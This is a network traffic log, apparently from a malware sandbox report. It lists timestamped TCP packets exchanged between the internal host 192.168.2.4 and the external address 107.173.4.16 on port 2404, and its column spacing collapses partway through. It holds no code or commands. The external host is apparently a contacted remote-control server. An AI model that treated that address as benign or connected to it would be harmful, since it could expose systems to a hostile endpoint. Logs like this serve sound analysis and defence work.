Sep 25, 2024 16:01:32.763324022 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763335943 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763406038 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.763556957 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763578892 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763591051 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763624907 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.763624907 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.763669968 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763684988 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763698101 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763711929 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.763730049 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.763750076 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.764513969 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.764534950 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.764548063 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.764559984 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.764574051 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.764585018 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.764585972 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.764594078 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.764616013 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.764687061 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.765291929 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765312910 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765326023 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765351057 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.765405893 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.765737057 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765779972 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765791893 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765844107 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765853882 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.765857935 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765872955 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.765933037 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.765933037 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.766418934 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766519070 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766669989 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766710997 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.766781092 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766793966 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766807079 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766819000 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766827106 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.766833067 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766846895 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.766856909 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.767002106 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.767534971 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.767558098 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.767571926 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.767621994 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.767635107 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.767641068 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.767641068 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.767736912 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.768171072 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768218994 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768255949 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.768415928 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768438101 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768450022 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768461943 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768553019 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768567085 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.768620968 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.768620968 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.768620968 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.769280910 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.769293070 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.769304037 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.769323111 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.769335985 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.769349098 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.769361019 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.769362926 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.769362926 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.769463062 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.770124912 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770138979 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770157099 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770170927 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770183086 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770185947 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.770196915 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770210028 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770231962 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.770231962 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.770251989 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.770279884 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.770978928 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.770991087 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771003962 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771095991 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771141052 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771155119 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771167040 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771178961 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771190882 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771202087 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771214962 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771238089 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771249056 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771249056 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771249056 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771255970 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771272898 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771275997 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771285057 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771297932 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771311045 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771323919 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771336079 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771348000 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771362066 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771373987 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771377087 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771377087 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771377087 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771377087 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771397114 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771440983 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771460056 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.771955967 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771969080 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.771991014 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772001982 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772015095 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772027969 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772042036 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772043943 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772043943 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772063017 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772150040 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772170067 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772191048 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772202015 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772209883 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772214890 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772228003 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772234917 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772253036 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772264957 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772278070 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772290945 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772301912 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772303104 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772303104 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772303104 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772315979 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772320032 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772327900 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772342920 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.772367001 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772367001 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772399902 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.772867918 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773082018 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773101091 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773113012 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773118019 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.773125887 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773140907 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773153067 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773165941 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773178101 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773190022 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773204088 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773216963 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773228884 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773238897 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.773238897 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.773238897 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.773242950 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.773238897 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.773288012 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.773288012 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.785748959 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.794686079 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835589886 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835603952 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835683107 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835702896 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835704088 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835716009 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835738897 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835752010 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835761070 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835763931 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835777998 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835791111 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835803032 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835810900 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835810900 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835817099 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835870028 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835881948 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835907936 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835920095 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835921049 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835921049 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835921049 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835956097 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835971117 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.835979939 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.835990906 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836004972 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836008072 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.836018085 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836042881 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.836071968 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836085081 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836097956 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836184025 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836195946 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.836208105 CEST  2404         64862      107.173.4.16  192.168.2.4
                                    Sep 25, 2024 16:01:32.836219072 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836220980 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836220980 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836234093 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836239100 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836247921 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836329937 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836329937 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836334944 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836349010 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836369038 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836383104 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836395979 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836401939 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836409092 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836422920 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836431980 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836525917 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836539030 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836550951 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836563110 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836595058 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836622953 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836719990 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836733103 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836746931 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836760044 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836771011 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836785078 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836796999 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836808920 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836847067 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836858988 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836882114 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836888075 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836888075 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836888075 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836888075 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836901903 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836915970 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836930037 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836937904 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836951017 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836954117 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836966038 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836978912 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.836978912 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.836994886 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837007999 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837019920 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837033987 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837047100 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837052107 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837052107 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837059021 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837071896 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837085009 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837099075 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837110043 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837110043 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837110043 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837125063 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837138891 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837151051 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837162971 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837172985 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837172985 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837172985 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837176085 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837189913 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837203979 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837219000 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837228060 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837244034 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837481022 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837495089 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837512016 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837527037 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837558985 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837574959 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837650061 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837662935 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837675095 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837686062 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837711096 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837711096 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837724924 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837742090 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837754011 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837768078 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837780952 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837795019 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837795019 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837795019 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837802887 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837814093 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837835073 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837882996 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837883949 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838041067 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838052988 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838067055 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838078976 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838090897 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838094950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838104963 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838118076 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838129044 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838134050 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838144064 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838148117 CEST648622404192.168.2.4107.173.4.16
